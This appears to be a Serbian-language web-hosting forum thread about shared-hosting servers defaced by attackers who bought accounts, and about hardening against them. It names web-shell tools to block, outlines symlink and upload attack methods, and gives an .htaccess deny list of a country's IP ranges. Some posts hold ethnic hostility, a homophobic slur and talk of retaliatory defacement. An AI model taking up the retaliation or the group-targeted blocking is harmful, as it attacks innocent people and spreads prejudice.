1) blokirati ip adresu preko firewall-a
2) evo vam maxmind promo kod za whmcs http://www.maxmind.com/app/ccfd_promo?promo=WHMCS4562
preko njega se moze aktivirati besplatno maxmind anti fraud sistem koji ce odmah oznaciti laznu transakciju i nece dozvoliti placanje.

Hvala Darklord

Sobzirom na dosta ovakvih stvari sa juga Srbije ja sam blokirao pola njihove mreze u whmcs. MaxMind ponekad smara svi znamo kako on radi i njegov metod upita u podatke o IP adresi i uporedjivanje sa korisnikom je suludo ( ovo je jedan od losih ( glupljih ) ) provera ovog software-a.

Ok jedno resenje je free 1000 provera mesecno, ima neki whmcs kupon pratite link u Setup - Fraud Setup

Mnogo ti je jednostavnije da promeniš hosting. Verat je otkad postoji bušan i svako malo ga neko ovako rasturi.

Izgleda nisi citao o cemu se radi vec si procitao zadnju liniju pa odgovorio na nju :) ne radi se o Veratu

Nema tu pomoci... Neki od pomenutih servera jos vrte php 4.x.x ... Nece ljudi da urade upgrade servisa php,mysql,apache itd... Hiljade sajtova ce biti nedostupno dok se ne uradi upgrade,to je par minuta,ali... Dok se server ne zakrpi,ne vredi pricati uopste o joomli,wp=u,drupalu itd...

Ocigledno ne razumete, ne radi se o nijednom napomenutom servisu. Ovo je samo upozorenje sistem administratorima. Druga stavka ako imate dobru ideju kako smanjtii rizik podelite ako nemate neku pametnu misao onda se samo zadrzite u ulozi citaca.

Mnogo dobro razumemo.

Zašto su uopšte Albanci krivi, a nisu admini koji ne rade svoj posao već teraju bušne servise na serverima? Pusti ti Albance, nemaju oni ništa sa tim što su domaći hostovi bušni, i tražiti krivca u njima je spinovanje.

Upload fajlova je problem,napadac uploaduje shell ili nesto slicno kao iz tvog posta i onda pravi harakiri na serveru. Procitaj malo sta je RFI napad,bice ti sve jasnije.

A može li da se isključi remote file inclusion? Može. Pa ko je kriv onda?

Takodje,pola tih "administratora" ne zna sta je mod security, preko njega mogu da blokiraju te shell scripte tipa c99shell,r57shell,sniper itd...

I naravno disable functions kao sto su shell_exec,exec itd...

Ako ste primetili ona php skripta sluzi samo za skidanje potrebnih stvari to ne moze da se zabrani, pogledajte druge skripte. Kakve veze mod_security ima sa ovim kada se ovo ne vrti kroz apache ?

suPHP nece pomoci :) napadac ne pokrece php skriptu i time pravi haos. Znaci php skroz zaobidjite :) a tu se podrazumeva i apache i dodatni moduli. Tako da tvoj komentar pola tih "administratora" bitno da si ih stavio pod navodnike ne zna sta je mod_security ( ne znam da li ti je ovo bio zakljucak za ovo situaciju ili inace.. ) posto si dao pogresnu dijagnozu. Sto bi tebe onda trebalo staviti u navodnike sobzirom da si skroz promasio stvar? :)

Pricam generalno.

Apache+mod security moze da resi problem. E sad,postoji mnogo kombinacija...

Takodje i rootkit hunter nije losa stvar,kada se namesti da svaki dan salje izvestaj na email... Najbolje na svakih 6 sati...

Na site5.com sam video zanimljivo rešenje (mislim da se to zove "chroot" možda grešim) kojim se sajt izvršava u svojstvu svog usera, čime dobijamo da je vlasnik datoteka koje kreira PHP isti kao i FTP user. Na taj način napadač ne može uraditi overwrite datoteka unutar drugih sajtova na tom shared hostingu.

Za 6 sati "haker" je mogao da zameni vec hrpu fajlova na serveru.

Par tips
1) Pozeljno raditi upgrade software-a ( kernel se podrazumeva )
2) Twiknuti php.ini
3) Ograniciti pristup perl-u

A zabrana pristupa samom htaccess-u sa localhosta, hoće li to rešiti stvar?

Ako iko ima pristup htaccess-u nije uopšte bitno ima li ili nema perl, može da defacuje statičkom html.

Ti hunteri i slicno su, po meni, lose resenje. To je samo da znas da VEC imas problem, a ne sprecavanje. Redovno odrzavan server, svez stable (ne najnoviji, vec malo stariji, ali jos uvek stable i odrzavani - ali ne ni bajati) softver, apache, php, mysql su osnova. Dodati mod_security je odlicno ako moze, ali onda imas problem koji imas i sa konzervativno namestenim setovanjima za php.ini : zale se korisnici. Naravno, treba imati i neki IDS/IPS, redovono odrzavane sve pakete... sve redom.

Realno, jako dobro zatarabljen server moze da resi mnogo toga, ali ne sve - cinjenica je da shared hosting uvek moze da se busi od strane korisnika, posebno ako se potrude i ako ZNAJU sta rade. Ne neki klinci sa skriptama, vec neko stariji, iskusan i odlucan, to moze uvek da resi. Jedino resenje za to je screening korisnika. S'druge strane jako tight security odbija korisnike, jer im mnogo toga ne radi... pocev od gotovih CMS-ova, pa do "custom" resenja pisanih nogama....

Idealno? Bataliti shared hosting. To je OK za neke primene, ali tih je sve manje... Za sve kojima treba aktivan sajt, baza i sl. - ima jako povoljnih VPS-ova.

P.S. Neko je spomenuo chroot. To nije lose, ali je na korak do VPS-a, pa onda, nekako, meni VPS deluje bolje. Naravno, ako mora shared, chroot se podrazumeva.

To je suPHP ne chroot "chroot" je druga stavka napadac izvrsi izmenu preko perl skripte koja neki nacin prati symlinkove fajlova koji nisu od tog korisnika ( strange ) ok ne znam sta bi se desilo da je "haker" pokrenuo te skripte ja sam generalno dobio poruku sa sumljivom narudzbom i uhvatio sam ga dok je jos uploadovao stvari. Ne znam kako bi se na mom sistemu ovo odrazilo ali vidim da je na mnogima ostavilo tragove ( verujem da su koristili suPHP ) ako nisu that is stupid.

Ma moraš sprečiti pristup .htaccesu iz svih skripti, tako da samo preko FTP može da se promeni! Inače imaš jednostavnu redirekciju na example.com/defaced.html

Stvar koju si naveo mislim da ne moze da se izvede. Moze da se doda chattr +i na sve .htaccess fajlove ali to je problematicno ako korisnik hoce da menja a sto se tog fajla tice on je samo dodao handlers za apache da mu otvara .pl skripte ( ukoliko nije ukljuceno u osnovna podesavanja ) i directoryindex shit.html btw po skriptama mozete da zakljucite kako one rade i pronadjete nacin za sebe kako se najbolje zastititi i kako "opraviti" sajt koji je defejsovan

Pokušaj. Nemam ovde apache i ne mogu ništa da isprobavam. Znam da će to značiti da nekima skripte neće raditi, ali nemaš alternativu, jer ko ima htaccess ima i načina da difejsuje sajt, i to ne jedan nego sto.

Meni se čini da sam odavno upravo radio tako nešto, i to preko httpd.conf ali stvarno nisam siguran, i ne mogu sada ništa da isprobam. Sigurno nisam koristio chattr, jer nisam ni koristio linux nego *BSD.

Mnogo ljudi se ovdje javilo koji najprije nisu pročitali o čemu se radi, a onda su ponudili riješenja koja pokazuju da nemaju iskustva sa konkretnim slučajem, odnosno shared hostingom.

Dobro riješenje ne postoji, to odma da svima bude jasno.
A neko riješenje se kreće između toga da sve zaključaš i praktično onemogućih korisnicima da bilo šta implementiraju kompleksnije od <?php echo 'hello world'; ?> - i toga da napraviš igralište za script kiddies.
Svako treba da nađe neki svoj balans u ovome. U svakom slučaju situacija je mnogo smorna i neriješiva.

@Tyler Durden

Nije baš tako, može da se ima mnogo više od echo/print. Recimo može htaccess da se isključi, i da imaš sve sem nekih bezveznih sitnica.

Bravo Tyler

Bojane .htaccess nema mnogo uticaja u deo oko "hakerisanja" sa ovim fajlom pokusavaju da ukljuce neke opcije koje mozda nisu ukljucene i takodje koriste samo rewrite rule da iscitaju sadrzaj sa neke x lokacije.

Ako se neko trudi da skonta zasto mu je sajt "haknut" a ne nalazi nista posebno neka pogleda .htaccess mozda je tamo obican rewrite rule. Sve u svemu nije .htaccess problem sobzirom da php_flag i php_value ne radi u CGI modu, pod uslovom da se koristi php-cgi ( suPHP and bunch of things )

Ovaj "haker" nije koristio nastavak .pl ali ovo moze delimicno da pomogne kod "hakera" koji ga koriste i nemaju pojma.. Filesmatch sve sto je .pl disable , more tips je da onemogucite da stvari u /tmp folderu mogu da se pokrecu and so one ..

Update:
U svaki virtual host da se nalepi

<FilesMatch "\.(cgi|pl|py)">
Deny from all
</FilesMatch>

Ma nije bitno šta je konkretno haker radio.

Ako može da promeni htaccess, može da uradi redirect ili DirectoryIndex prebaci u defaced.htm i uradio je posao. Ne treba mu ništa sem toga.

Da vidim da je pokušao da dođe i do lozinki za bazu, ali bez obzira da li jeste ili ne, uradio je posao.

Mislim da je bitniji problem onemoguciti "hakeru" da preko komsiskog sajta izmeni tudje fajlove

Trenutak samo, koliko vidim u pitanju je Perl skripta. Nemam puno iskustva sa Perlom, osim sa njakanjem ts2perlmoda u svoje vreme, ali me interesuje pod kojim korisničkim nalogom se PL skripte izvršavaju na shared hosting nalozima?

Mislim apache nisam siguran.

Da problem moze da se resi npr da se doda chmod 750 na perl potom napraviti grupu perl i korinike koji moraju da pokrenu perl dodati u grupu ( cpanel ce se raspasti ako ne moze da pokrene neke stvari pod cpanel korisnikom ( potreban perl ) kao i majordomo itd.

Pozdrav!
Meni su sredili sajt.
Dugo vremena mi je trebelo da provalim da su uploadovali fajl dassdsas.jpg.bmp.gif.jpeg.png.php
Moja javna skripta za slike je to "progutala" i imali su jednostavan pristup mom serveru...
LOL.. Bitno je da sam vratio bekap

@darklord
Naravno i to je problem, ali rešenja ima, recimo da preko php.ini zabraniš fajl funkcije, mada je u suštini zas*ao sam korisnik što je stavio bušnu skriptu na server, ali znam da zbog posla to ne može i da mu se kaže.

Ok Bojane medjutim ova tema treba samo da upozori ljude koji se bave sistem administracijom da "profesionalni albanski hakeri" ne traze busne skripte kako bi pristupili serveru vec su nasli novi vid "hakovanja" a to da kupe pristup serveru :)

Prica da kupuju ne pije vode,malo je verovatna,niko nije toliko glup.

A zasto sam ja toliko postova pitao? Dakle konstantno pricam o tome da ljudi kupe nalog. Procitaj moj prvi post naveo sam da je placeno preko paypal-a verovatno ukradene adrese.

Dakle decko je kupio nalog i poceo da uploaduje skripte koje sam podelio ovde. To je uradio u 2:19 kada bi trebalo da svi spavaju. Sistem automatski aktivira nalog odmah posle placanja.

Evo ga i domen

Domain Name: albtm.net
Registrar: Name.com LLC

Expiration Date: 2013-07-11 20:10:29
Creation Date: 2010-07-11 20:10:29

Name Servers:
ns1.hostyetu.com
ns2.hostyetu.com
ns3.hostyetu.com
ns4.hostyetu.com

Ovaj domen je jutros bio na ns1.adiswitch.com i ns2.adiswitch.com sada je dalje uzeo , trazi svaki hosting servis koji u sebi ima rec Srbija.

Dodatan info ( sorry sto postujem vise puta )

Evo ga apache je offline na serveru gde je albtm.net dakle napravio je harakiri :)

174.122.127.90

http://174.122.127.90/~albtmnet/

update: apache radi

Jeste,tu recenicu sam preskocio.

Zalosno,pa dobro,placa preko paypal-a,negde ce ostaviti trag...

Ako je u pitanju shared hosting i ako neko vec IMA nalog, JAKO je tesko da mu zabranis nesto kao deface servera. Fora je u tome da radis na tome kome prodajes, eventualno omogucis brzo vracanje, a tog lika gonis krivicno (ako mozes). Sve drugo, realno, nema bas puno smisla, posto ti mozes da zabranis SKORO sve - ali onda taj hosting gubi smisao. Toliko zatvoren hosting verovatno nece biti upotrebljiv za bilo sta sto nije hello world.

Dobro skontali ste poentu :) a nekog krivicno da gonis ko se nalazi na Kosovu to je vec diskutabilno, kao i to da li je to njegov ip itd itd. Kupovinu obicno izvrse preko ukradenog paypal naloga.

Uglavnom tako oni hakuju nase sajtove i prave se pametni i mnogo vazni a to svakako nisu , obratite samo paznju da vam se to ne desi dok spavate. Toliko u ovom javljanju :)

Pazi, ako je tenkre platio, a ti imas dokaza da je taj nalog hakovao, mozes da ga prijavis i paypal-u. A ako niko ne odgovori na prituzbe paypal-a, onda se lepo zali provajderu (koga zabole, na Kosovu), a onda, posebno kad je to PayPal, pocne da se zali natprovajderu. Par meseci kasnije paypal blacklistuje ceo range koji ima Kosovo, plus krene da se pravi frka oko hakera pa odu na crne liste, pa i mail pocne da im zeza, pa....

Uglavnom, ti se zalis, prijavis. Na dalje nije na tebi. Ali nije bas bez ikakvog efekta - kad dodje do kradje pravih para vrlo brzo se pojave efekti.

Problem je sto na internetu imas toliko opcija kako da surfujes anonimno,high brzine proxy-ja,socks4,sock5 koji kostaju par $$$...

Uglavnom ko god ima slicnih problema treba da prijavi problem provajderu,policiji i kad se broj prijava poveca verovatno ce i biti rezultata. Saradnja mora da postoji,to je poenta,drugacije se problem ne moze resiti.

Jer kao sto je rekao @tyler,problemi kao gore pomenuti su skoro ne resivi!

BTW :)))

http://www.blic.rs/Vesti/Polit...bija-koji-je-kostao-28000-evra

Strasno i zalostno, sajt se hostuje na netfirms a verovatno su ga hakovali prethodnom kupovinom naloga :) kako ih nije sramota uzimaju neki smesan shared hosting a naplatili su za sajt 28 000E a ko ce vise da odgovara za ovakve projekte

Da, ovo je stvarno previse...
Ne mogu da shvatim da ne postoji ni minimalna odgovornost.

na Blicovom sajtu stoji:



jel smo haknuli mi njima nešto uopšte?

Ovo je sramota naša.

2008/09 su srusili 10ak sajtova,u fazonu dokazali smo da mozemo ali necemo :)

Nasi ljudi ne koriste "pederske" fazone kao sto to oni rade. Kupiti nalog na serveru pa "hakovati" je veoma jadno http://www.youtube.com/watch?v=Dh3iHXWtovs

Evo ovde lepo stoji da se covek ulogovao kao admin Marko a pre toga je prigrabio pristup bazi i izmenio password. Trebali bi da napravimo negde neki post da "hakerima" kazemo da su im truli fazoni i da su lame

Lame ili ne,oni svoj cilj ispunjavaju maksimalno! Ne mozemo vise pricati kako su oni lame,jer su nam sajtovi lame,lame... :)))

Još stigli da postave i video sa Neviđeno glupim repom, a naši još nisu videli da im je sajt haknut. E .....

Moraju prvo da nadju admin panel,a kada ga nadju moraju skontati kako se koristi :) > Hvala bogu pa su napravili video,pa neka pogledaju kako su oni postavili mapu,i onda da urade replace :)

Da se vratimo na temu.

Treba pisati o napadima,kako se zastiti od istih itd....

Pa moglo bi da se stavi odlaganje aktivacije paketa dok se ne proveri..tipa 24H cekanja...i to aktiviranje da se odradi kad se planira duze biti za racunarom, u slcuaju ne volje a se moze odmah reagovati
Onda napraviti neko programce koje ce da radi "monitoring" novih korisnika i u slucaju da se pocne u pocetku uplodati pl, py, male php script i sl fajlovi da salje notifikaciju sys adminu da rucno pregleda fajlove..

Nista specijalno, i moze se lako zaobici al malo otezava posao tim "hakerima"

Cisto da pitam onako laicki koliki je problem imati svoj server a ne rentirati neciji deljen sa nekim.
Naravno ne u slucaju nekog pojedinca koji je eto resio da napravi internet stranicu vec u slucaju ove nase vlade i sajtova za koje su bacili enormne sume a vi kazete da ih neki tamo klinci primitivnim metodama obaraju sve slusajuci primitivni rep.
Pa za vas eksperte su mozda te metode primitivne (ne mozda nego jesu nista narocito) ali kad neko prosecan cuje kako neki klinci to rade vladi njegove drzave pre ce da kaze da mu je vlada primitivna kao i sto jeste kad ne mogu da izdvoje jedan server za svoje potrebe gde nece moci neko putem ppayla da dobije pristup.
A na ovim linkovima se vidi na su ti isti obarali i ruske sajtove sto znaci da bi vlade trebalo da reaguju i povuku po koji potez na hvatanju pocinilaca.

Od hvatanja nista,jer od 2008 godine haraju,ovi Albanci su za par godina srusili preko 20.000 sajtova!!!

A da je server fizicki u njihovim prostorijama i da ga sruse,mogu da rese za minut,a ovako moraju da salju mailove podrsci iz Amerike,pa vremenska razlika,pa dok nadju backup,pa dok nadju problem,pa dok ta konverzacija prodje kroz 10 ljudi,e tek onda rese problem,tj samo vrate sajt na stanje od juce,ali problemi i dalje ostaju...

Tako da mozemo ocekivati nove napade...

ajde i naši da im se revanširaju, ono , ne znam da li će naći neko njihov sajt za difejs, mada, nije to toliko bitno ....

ali ne mogu da shvatim ove naše, da posle toliko skršenih sajtova ne mogu da se uzmu u pamet i da porade na bezbednosti, nego uvek ispadnu voline ....

Mislim da niko nije skontao na koji nacin oni "hakuju" stvari. I da je to problem primera radi sajtove su hakovali tako sto su pokupili podatke za pristup bazi, promenili admin password prijavili se na sajt i promenili sadrzaj.

Vecina ljudi nije ni skontala o cemu se radi i iako vrate backup sve je to lepo opet im se "hakne" sajt zbog starih podataka za pristup bazi. Kupovinom hosting naloga na serveru "haker" dobija daleko vecu sansu da nesto uradi na tom serveru. U svakom slucaju treba povecati bezbednost samog servera, takodje veoma vazni sajtovi primera radi drzavni nemaj sta da rade na shared hostingu od 60$ godisnje. Recimo sajt koji je "haknut" naplacen je 28 000E ako za ove pare nisu mogli da naprave pristojno resenje za hosting ne znam koliko para im onda treba, da li je faktura za normalan hosting trebala takodje da bude 28 000E i red bi bio da neko vec odgovara i da programere i dizajnere ne vuku za nos sa takvim bolesnim cenama. Hrpa ljudi im se smeje a oni misle kako smo mi neuki a i izmedju ostalog sta ljudi znaju i sta je sajt i koliko on kosta ( obicni glasaci ) :)

Registrovane hosting firme bi mogle recimo da uvedu praksu da traže kopiju lične karte novim klijentima. Izgleda da je tako vreme došlo. To je najprostije rešenje da uhvatiš onog ko je napravio "hakeraj". Isto kao što veliki provajderi po inostranstvu rade prilikom iznajmljivanja servera.

Pozdrav svima

Vrlo zanimljiva tema i naravno jako korisna.

Mnogo prakticnih savjeta sam dobio na ovom forumu i svaka cast pojedincima koji zele znanje da podjele sa drugima.

Pored nekih osnovnih koraka kada je u pitanju zastita wordpress blog-a/stranice, sta je to sto se MORA uraditi? (pod osnovnim mislim redovan update, promjena default login stranice, redovan backup, promjena defaultnih pristupnih podataka, sakriti verziju WP-a, promjeniti default prefiks baze, jake sifre, file permiss., )? Koji je plugin "must have", odnosno korak/ci koji se moraju preduzeti?

Hvala

P.S. Milan Kragujevic blog je opet offline - "You've just got owned by CYB-IMP"

Znam, borim se sa tom gamadi, ali su mi sredili pristupne podatke...
Kontaktirao sam hosting provajdera i kažu da će biti sređeno do ujutru

^^

Nikad mi nece biti jasna aktivnosti ovih pojedinaca, jer trositi vrijeme da nekom napakostis je neshvatljivo.

Hm... Milan Kragujevic - Jel' wordpress slucajno? Jesi pripremio iduce korake kad je zastita u pitanju i o cemu se tacno radi - moze i na pp. Hvala

Plasim se da, kad nisam prisutan (kad odem na odmor npr.), se malo zaigraju i obore mi stranicu, a nema ko drugi da je podigne...



_{[Ovu poruku je menjao Davor Stanković dana 09.08.2011. u 00:14 GMT+1]}

Pričamo globalno i razlozi nisu bitni. Bitan je način na koji se radi, i šta treba preduzeti povodom toga. To je tema diskusije.

Pa dobro, naravno...

Ja postavih pitanje u skladu sa temom, pa evo cekam odgovor :)

Jeste.. WP.. najnovija verzija... A stavljao sam svakave šifre (iz filmova, anime serija, običnih serija, adnimiranih filmova itd) i to na različitim sistemima i opet provaljuju.. hmmm...
Što se tiče zaštite... probao sam da skinem bekap ali mi je pukla konekcija i sada ne vidim sajtove... to je zbog telekomovog dns-a

@Davor

Ako misliš sa korisničke strane dovoljno je da promeniš putanju admin pristupa, kao i da redovno ažuriraš CMS (ako se radi o public rešenju). Postoje za većinu CMS-a i različiti dodaci vezani za security, ali to nikako ne preporučujem, jer što više dodataka imaš više si ranjiviji. Dosta puta se desi da se upravo tu neka rupa provuče ili da se recimo još na serveru zameni prava verzija dodataka malicioznom (kao što je skoro bio slučaj sa nekoliko WP dodatka).

@Milan, koristi random generisane sifre - kombinacije brojeva i slova (malih i velikih).

Blog ti je opet online...

Svaki savjet sto se tice wordpress-a i zastite je vise nego dobrodosao, pa makar bio i onaj najbanalniji...

I licno koristim generisane sifre (last pass radi odlican posao).

@Stefan Jocic

Zahvaljujem. Ne bih se ja bunio i da procitam neke zahtjevnije savjete, naravno ako su potrebi :)

Za 10 - 15 - 20 e godisnje cimanje oko licne karte je gubitak.

Davore, ako bi mogao da sakrijes config fajl sa podacima za pristup bazi to bi ti daleko bilo korisnije. Recimo hrpa wordpress sajtova je hakovana ne zbog busnog wordpress-a nego zbog toga sto je neko preko symlinkova uspeo da iscita config fajl i prigrabi pristup bazi.

Dakle to jedan od nacina , vise od toga zavisi od sistem administratora na ciji rad ne mozes da utices, tacnije mozes tako sto ces usluge web hostinga gledati da uzmes kod ljudi koji imaju iskustvo , realno danas svako moze da zakupi cpanel i isklikce par stvari i tako doda nalog i eto on je "administrator" sajtovi se obaraju bas zbog takvih "administratora"

_{[Ovu poruku je menjao Darklord dana 09.08.2011. u 00:28 GMT+1]}

Pa sad ne bih se složio da se ne isplati. Oterasiš se dece koja kače bušne skripte i fb, yt klon skipte. Takođe "odbiješ" svakog sa lošim namerama, a što je najbitnije svi sajtovi klijenata budu korak bliže sigurnosti. A i tebi kao provajderu se to isplati. Uštediš vreme koje bi potrošio na razogovoru sa klijentima, objašnjavanjem i povraćaju podataka.

Pomagajte, kako da zaštitim wordpress?
Kako da sakrijem admin adresu(da nije wp-admin) ???

Ima jedan plugin - "Login Lock" koji radi taj posao za tebe (ne znam da li ga Stefan preporucuje). Ili to mozes i sam uraditi (parce koda ubacis u htaccess ako se ne varam), ali o tome nek' te savjetuju iskusnije kolege.

Milane majku mu promeni podatke za pristup tvojoj wordpress bazi. Tvoj sajt je "hakuje" na glup nacin "haker" ima pristup tvojoj bazi koliku god veliku komplikovanu sifru da stavis on ce da je promeni. Promeni pass za mysql korisnika.

ne razumeš.. ja menjam šifru za:
ftp
mysql
wordpress
sve ostale cms-ove
sve skripte

NE SAMO USER NALOG ZA WORDPRESS!

Aha ok sorry. Pogledaj apache access i error logove. Ako ti "haker" menja .htaccess neka ti Zeljko doda chattr +i na .htaccess ( ne znam kako su ti hakovali sajt cak nisam ni uhvatio sajt u periodu kada je hakovan tako da dajem samo neke mogucnosti )

Druga stvar ako su ugrabili full pristup mysql serveru onda je dzabe to sto ti menjas mysql password. Nemam pojma ako bi podelio pristup na hosting mogao bi eventualno bolje da pomognem i da sumiramo nacine "hakovanja"

Danijel,

upeco sam hakera...
91.187.103.4

I maloprije sam napisao pogresan plugin... U pitanju je Stealth Login, ne Login Lock. :)

stealth login nikako!
pravio mi je probleme na serveru i zaključavao sve i svašta.. to ludo n edolazi obzir!

Kontao sam da ste vec ispraktikovali gledanje apache logova

Dodaj u wp-admin folder .htaccess

<Limit GET HEAD POST>
order allow,deny
# Country: ALBANIA
# ISO Code: AL
# Total Networks: 35
# Total Subnets: 206,592
deny from 31.22.48.0/20
deny from 31.44.64.0/20
deny from 31.171.152.0/21
deny from 31.222.40.0/21
deny from 46.183.120.0/21
deny from 46.252.32.0/20
deny from 46.255.144.0/21
deny from 77.242.16.0/20
deny from 79.98.112.0/21
deny from 79.106.0.0/16
deny from 79.171.48.0/21
deny from 80.78.64.0/20
deny from 80.90.80.0/20
deny from 80.91.112.0/20
deny from 81.26.200.0/21
deny from 84.20.64.0/19
deny from 91.210.136.0/22
deny from 91.230.254.0/23
deny from 92.60.16.0/20
deny from 93.90.64.0/20
deny from 93.159.192.0/21
deny from 94.125.112.0/21
deny from 95.107.128.0/17
deny from 109.69.0.0/21
deny from 109.69.160.0/21
deny from 109.104.128.0/19
deny from 109.234.232.0/21
deny from 109.236.32.0/20
deny from 141.8.200.0/21
deny from 146.0.16.0/21
deny from 194.1.149.0/24
deny from 213.207.32.0/19
deny from 217.21.144.0/20
deny from 217.24.240.0/20
deny from 217.73.128.0/20
#
allow from all
</Limit>

Adrese sa Kosova su registrovane pod country AL

Ili zastiti wp-admin direktorijum sa sifrom

stavio sam
videću da'l radi :)
vratiću im milo za drago kad-tad

Nije neprobojna zaštita ali svakako pomaže

mod_fcgid i chmod 600 na fajlove sa pristupnim podacima

I od jutros su vredni...

http://www.milenijum-osiguranje.rs/

WP ima firewall pluginove koji javljaju na mail kada napadac nesto pokusava.

Imam par adresa, a i ovde postoji par ip adresa ne znam koliko bi vredelo da sastavimo mail i posaljemo provajderu ili kome? Njima treba pokazati gde im je mesto

Mislis da do sada nisu prijavljivane? Jesu i to vise puta,jednostavno ne vredi. Jedan od vecih problema jeste sto imaju medijsku paznju,a to kod uzrasta od 13 do 18 godina mnogo doliva ulja na vatru. Nece ovo nikada stati...

Dobio sam nekih logova,uglavnom je na serverima ubacen shell,preko njega su radili deface i mass deface. Da li su kupili hosting,ili su na razne nacine ubacivali shell-ove,saznace se...

pošalji mi na pp kako su provalili sajtove (moje).

evo sad radi wordpress firewall i blokirao je većinu napada (ja sam pokuavao, da vidim dal' radi :) )

Ako padaju redom jedan po jedan sajt na istom serveru onda definitivno nije dobro poštiman hosting...

Za početak provjerite pod kojim userom se vrti apache ili šta već

Ako je za sve sajtove isti user onda je to problem No1.

Ja podešavam tako da se svaki sajt vrti pod userom koji je i vlasnik fajlova pa na osjetljive fajlove možeš staviti chmod 400 ako treba.

Nemoj da stavljas linkove srusenih sajtova,ima ih mnogo vise od juce. Necemo trpati temu tim informacijama,a i offtopic smo skroz.. Ovde bi trebala biti diskusija na temu "zastite",na sta treba obratiti paznju itd...

Odgovorni su iskljucivo hosting provajderi, odnosno administrator doticnog servera. Nisam citao celu temu ali pretpostavljam da je bar jedan od sajtova imao neki RFI vuln koji je iskoriscen. Lik je iskoristio propust da uploaduje neki php shell i poharao server, jer privilegije i moduli nisu valjano podeseni.

Napadac je platio hosting paket da bi dobio mogucnost da uploaduje fajlove... i tako je izmenio sve ili vecinu sajtova na tom serveru... pa se ovde prica o tome kako je moguce zastititi se od takvih stvari...

Konkretno nemam ideju ali zar mislite da bi postojali veliki shared hosting provajder poput dreamhost-a, hostgator-a i slicnih ako bi neko tek tako mogao da srusi server(e)?

Mnogo ste otisli van teme, i previse mudrujete :) dakle ja sam temu stavio kao upozorenje sta moderni "haker" rade i ne niko nije imao neku formu ranjivu na RFI gde je uploadovan php shell ili slicno jer ova alatka generalno ne moze mnogo da uradi ukoliko se ista pokrece pod korisnickim username-om. Vise havarije prave perl skripte koje mogu da se uploaduju preko ( primera radi ) losih joomla modula i to obicno zavrsi u /tmp medjutim ukoliko ste /tmp mountovali kao noexec, nosuid itd nece imati veliki uticaj na server ( dakle sansa da nesto "haker" uradi je manja ) zato su oni pronasli idealno resenje a to je da preko tudjeg paypal naloga, platne kartice i slicno zakupe lepo nalog na serveru gde im je "hakovanje" olaksano.

I kao sto ste videli u onim skriptama one ne vrse klasican deface vec traze podatke za mysql pristup potom hakerisanje moze da pocne :)

Sto se tice tvog pitanja da li bi postojali veliki sistemi, pa da oni su verovatno takodje platili ceh medjutim iskustvo i masinerija ljudi su tu da se to ispegla, ne mora da znaci da su svi sistemi ranjivi neki su vise neki su manje, generalno su svi samo "haker" treba da im pronadje slabu tacku.

_{[Ovu poruku je menjao Darklord dana 10.08.2011. u 03:36 GMT+1]}

@Darklord
Linux System Administrator
Subotica

Ispratio sam ovu temu koliko mogu i koliko razumem. Meni su nejasne neke stvari?
Prvo da pocenem od tebe:
Darklord
Linux System Administrator
Subotica
Pises sa Viste ili laziras da pises sa Viste, malo neobicno za nekog ko se potpisuje kao Linux System Administrator
Dostupni su ti podaci a nisi zaposlen kod provajdera, znaci li to da i ti pomalo hakujes
Nick Darklord kako to vuce na hakeraj.

Zapoceta je tema ali nisam video da se upucuje na neke konkretne savete za zastitu ili cak da si napisao neki tutorijal.

Malo je cudno da ovi nasi provajderi neumeju ama bas nista a i nemaju nikakvu zasitu a ni odgovornost,
nisu valjda kod ona dva spomenuta provajdera svi genijalci, svi zaposleni i svi koji postavljaju sajtove.

Ono najbitnije sto mene zanima da li na linuxu tj. tim serverma moze da se ugradi real time provera uploada kojekakvih
malicioznih skripti i raznih exploita. Da li je to moguce ili bi tako nesto usporilo server do neupotrebljivosti.

Vidim da si na Orionu koji se sastoji od tri firme, jedna od tih firmi je pisala i postavljala sajtove za drzavnu upravu, to
im stoji u referencama. Sada po pisanju na raznim forumima ispada da je ovaj tvoj i moj provajder busan ko sito.

Citao sam na nekim linux forumima reakciju na ovu temu, to je za plakanje, prvo pisu se neke gluposti koje nemaju blage veze
sa ovim, problem busenja sajtova se marginalizuje, najljigavije su reakcije po sistemu ja to znam da uradim ali to je bjak.
To bljak je 20000 oborenih sajtova i nikom nista.

Sad se ja pitam kad se to vec dogadjapa gde je ta reakcija, zasto se to ne predoci provajderima kad vec imate saznanja,
zasto se ne obratite medijima, nasao bi se neki novinar koji bi zagrizao u ovu temu.

Prvo zasto moram da koristim linux ako sam linux administrator ? To mi je opis posla, sa widows serverima se ne znanimam :) a imam 3 racunara i svaki ima 2 OS-a, uglavnom za ubijanje dosade i pisanje ovde po forumu koristim win. Ali opet pokrecem pitanje zasto bi ja sada trebao da koristim linux ako on primera radi ne zadovoljava desktop potrebe?

O kakvom hakovanju ti pricas? Prvo wiki hakovanje pa onda idemo dalje. Moze da se ubaci real time zastita, sve zavisi i od servisa na kojima se ona vrsi.



Ne vidim kakve oni veze imaju samnom osim sto ih koristim za net i samo net ( nista vise )

Ja nemam saznanja, nesretni sugradjanin sa juga Srbije je hteo da postavi svoje skripte i ja sam ga ukebao i ovde sam ostavio info za sve ostale da znaju sta se desava i kako "hakeri" hakuju dosta servera ( realno veliku barijeru su presli kupovinom hostinga na serveru ili kradjom lozinki za naloge na serveru )

Cak mi se javilo par ljudi i ustanovili smo da su isti dan imali iste porudzbe medjutim vecini ne radi sistem ( ili nisu ukljucili ili ga nemaju ) za automatsku aktivaciju usluge posle placanja.

Mediji neka se bave pametnijim poslom, sto se oriona i ostalih provajdera tice imaju temu mogu da je eventualno procitaju a sta ce da rade njihov je posao a i za to su placenji tako da molim lepo

Dao sam savete oko cega da se ljudi baziraju, medjutim ne mogu da radim njihov posao. Right?

Danijel,

Kako si ga ukebao ako ne radis kod provajdera, da li je on to hteo da postavi kod tebe na server.
Kad se mediji upletu to ima efekta, primer kupovina seminarskih, diplomskih, magistarskih.
Drastican primer "domaci crnac" lopina, B92 podigao buku i prikazao kako ga panduri lemaju, ministar Dacic se izvinjava, lopina obecava
da nec vise da krade i sta se desava zadnja vest "domaci crnac" (24. jul 2011. u 10.06) uhapsen u Valjevu u provalnoj kradji.
Pises da je moguce postaviti real time zastitu na tim serverima, zasto je onda ne postavljaju to mi nije jasno?
Iznenadjujes me sa odgovorom da radis u Visti jer linux nema to sto tebi treba, prosto ne mogu da verujem da sam tako nesto procitao,
u zivotu sreo sam samo dva-tri coveka koji koriste linux a nisu ostrasceni.
:)

